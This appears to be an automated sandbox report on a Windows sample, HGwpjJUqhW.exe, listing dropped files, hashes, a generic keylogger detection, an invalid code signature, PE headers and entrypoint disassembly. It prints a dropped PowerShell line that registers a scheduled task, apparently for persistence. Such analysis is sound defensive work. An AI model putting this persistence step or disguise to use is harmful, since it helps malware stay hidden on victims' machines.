                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3kukcpt.i4h.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljgxyoux.55k.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3jmtbpn.whx.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qksi4hzq.uxl.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrrpui2l.ax0.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rr1magts.kou.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rr2nu3fl.zqj.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sp5zzo1t.4b2.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2hv0c5p.bdi.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrf2ookv.snx.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\updated.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.741657013789009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                                          C:\Users\user\AppData\Local\updated.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.741657013789009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                                          C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5289240
                                                                                                                          Entropy (8bit):7.236584667855755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:GgF0pT9HlrxRVwJMACNiREvBvlvwvCvxvq:pK9HhxRVwJMAqoetRqA9q
                                                                                                                          MD5:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          SHA1:FBFE0B4981D65EE16D16FCFF20B168F6C374C07F
                                                                                                                          SHA-256:E60B3FE4E29A9EA4BA95FC3D951D63E90ADC05B2A362234669BBD56292197547
                                                                                                                          SHA-512:FC5FB7CEA99E9BE9659C81B70D9D2361553288AE81C32C476091DB18D92E326091289224C4561E8A272F6B0F90889C1687B8F99EF68314EBFCE81FC6176BD3E3
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Users\user\AppData\Roaming\Logs\HGwpjJUqhW.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3414
                                                                                                                          Entropy (8bit):5.494882031884119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:L3yfkSafIfkNyy3kRafI3k0rfI3k0rfI3k02:WfkSTfkNt3kRT3k0E3k0E3k02
                                                                                                                          MD5:884487928C323259F886FED54D40D966
                                                                                                                          SHA1:59C5498F09813D301A3781D413042D87E13C2637
                                                                                                                          SHA-256:8E6DA6E51B41483060E3B1F17020D058642390DCA0778F1232C8D498E598F5AF
                                                                                                                          SHA-512:17924F950F36C65D7D69EC5A860B9689A77BBF1D21CA2E87AE53731FE9E0DB6C7EAFDB2D56B22B9AF99B89022A22AAB528D1C387DF9227552E6EAA0B3166107A
                                                                                                                          Malicious:false
                                                                                                                          Preview:----------Raised Exception--------------03/01/2025 23:38:19.863----------------..Exception PID=7652 TID=7656 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------03/01/2025 23:38:19.863----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=7652 TID=7656 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------03/01/2025 23:38:19.863----------------..Exception PID=7652 TID=7656 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke

                                                                                                                          C:\Users\user\Desktop\Logs\HGwpjJUqhW.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3386
                                                                                                                          Entropy (8bit):5.497766602900512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:L3N7fkSaCWjfkNyN73kPaCWj3ksrCWj3ksrCWj3ks2:tfkSQfkNK3kPQ3ksD3ksD3ks2
                                                                                                                          MD5:0457EFB96FA0F25B63484220A1638C1D
                                                                                                                          SHA1:D82035F4F49E2E85BD2C388C364EAD96C1F1D57F
                                                                                                                          SHA-256:11E9766889F0E2066B0A8397073811A0D3353A254F74A77E8EE2F962970F4635
                                                                                                                          SHA-512:AB11DF41941672A85175DCF0E7082979F3292DB74311FF48BEFFBA1DE3498D310123258BB564F69C114E87F700EA6FB23CCB3E26C442F90D2EFAC9399FD7A051
                                                                                                                          Malicious:false
                                                                                                                          Preview:----------Raised Exception--------------03/01/2025 23:38:14.160----------------..Exception PID=7344 TID=7348 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------03/01/2025 23:38:14.160----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=7344 TID=7348 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------03/01/2025 23:38:14.160----------------..Exception PID=7344 TID=7348 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke

                                                                                                                          C:\Users\user\Downloads\pc_yyb_2700200680_installer.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):7460336
                                                                                                                          Entropy (8bit):6.57889960952563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:196608:drEqXU8HMTs3juh96tfMcQPlQ+02cju5ehsV6ytfueau:7XU8YVVVuS
                                                                                                                          MD5:9DEE6F9C41488F78CC867C028EA58199
                                                                                                                          SHA1:A3D7F0D74AC5256FA04D529A754F01A4178161F3
                                                                                                                          SHA-256:B96B4DAA7ED00F2F5F54890988BB07AFC5B7DA9481B068CF8CC2CD2D91A7D54E
                                                                                                                          SHA-512:5D3F4303CB54A07335D6EE3FE80C8C7808811B90C7B9C5A91CCDCE13BA4D80D793F0F23750EE75B16B78A288CCAA19328B7ADBB785BF7ADE2900ADA68C039C68
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.........ydL..7L..7L..7X..6X..7X..6...7...6_..7...6F..7...68..7*..7F..7X..6O..7X..6e..7X..6N..7L..7]..7..6...7...6E..7...6n..7...6M..7...6?..7...6w..7X..6a..7L..7...7...6...7...6M..7...7M..7L..7M..7...6M..7RichL..7........................PE..d.....Gg.........."......$<...5.......6........@.............................Pr......$r...`.........................................@@M.@....JM.......T.......Q.......q..U....q.......H.T.....................H.(.....H.8............@<..............................text...\"<......$<................. ..`.rdata...O...@<..P...(<.............@..@.data....Q....M......xM.............@....pdata........Q......^Q.............@..@_RDATA........T.......S.............@..@.QMGuid. .....T.......S.............@....rsrc.........T.......S.............@..@.reloc........q.......p.............@..B........................................................

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.236584667855755
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.44%
                                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                                          • InstallShield setup (43055/19) 0.42%
                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          File name:HGwpjJUqhW.exe
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5:c4503d77f7a1bd9ad2b198d01e69bc43
                                                                                                                          SHA1:fbfe0b4981d65ee16d16fcff20b168f6c374c07f
                                                                                                                          SHA256:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547
                                                                                                                          SHA512:fc5fb7cea99e9be9659c81b70d9d2361553288ae81c32c476091db18d92e326091289224c4561e8a272f6b0f90889c1687b8f99ef68314ebfce81fc6176bd3e3
                                                                                                                          SSDEEP:98304:GgF0pT9HlrxRVwJMACNiREvBvlvwvCvxvq:pK9HhxRVwJMAqoetRqA9q
                                                                                                                          TLSH:F836CFA0B642C822C1631678DD1B97F5B975BF315F641893BAF53E0C3E3E5623828297
                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:dd9d5b5252b5b513

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x6dc144
                                                                                                                          Entrypoint Section:.itext
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                          DLL Characteristics:
                                                                                                                          Time Stamp:0x64C252F8 [Thu Jul 27 11:20:24 2023 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:07af52ac52c26a20d4efc068ff8bb754

                                                                                                                          Authenticode Signature

                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                                                                          Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                                                                          Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                                                                          Serial:7098774ED29B0565AB114EF2F2871CF7

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          add esp, FFFFFFF0h
                                                                                                                          mov eax, 006D9A34h
                                                                                                                          call 00007FBF58BB8009h
                                                                                                                          call 00007FBF58E89730h
                                                                                                                          mov edx, 006F8295h
                                                                                                                          mov eax, 006F8294h
                                                                                                                          call 00007FBF58E89769h
                                                                                                                          movzx edx, byte ptr [006F8295h]
                                                                                                                          movzx eax, byte ptr [006F8294h]
                                                                                                                          call 00007FBF58E89C86h
                                                                                                                          mov eax, dword ptr [006EDC88h]
                                                                                                                          movzx eax, byte ptr [eax]
                                                                                                                          sub al, 01h
                                                                                                                          jc 00007FBF58E8C751h
                                                                                                                          je 00007FBF58E8C75Bh
                                                                                                                          dec al
                                                                                                                          je 00007FBF58E8C76Ah
                                                                                                                          dec al
                                                                                                                          jne 00007FBF58E8C770h
                                                                                                                          call 00007FBF58E83993h
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          xor ecx, ecx
                                                                                                                          mov dl, 01h
                                                                                                                          call 00007FBF58E83D6Ch
                                                                                                                          jmp 00007FBF58E8C7C0h
                                                                                                                          call 00007FBF58E89CEEh
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          jmp 00007FBF58E8C74Fh
                                                                                                                          movzx eax, byte ptr [006F8295h]
                                                                                                                          call 00007FBF58E89E37h
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          jmp 00007FBF58E8C73Ch
                                                                                                                          call 00007FBF58E89F73h
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          cmp byte ptr [006F8294h], 00000000h
                                                                                                                          jne 00007FBF58E8C78Bh
                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          call 00007FBF58C29C4Dh
                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov edx, 006DC240h
                                                                                                                          call 00007FBF58C296F4h
                                                                                                                          mov ecx, dword ptr [006EDCC8h]
                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov edx, dword ptr [006D3F6Ch]
                                                                                                                          call 00007FBF59C29C3Ch

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2f90000x3f96.idata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3290000x1ef260.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x508c000x2918.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ff0000x29718.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x2fe0000x18.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
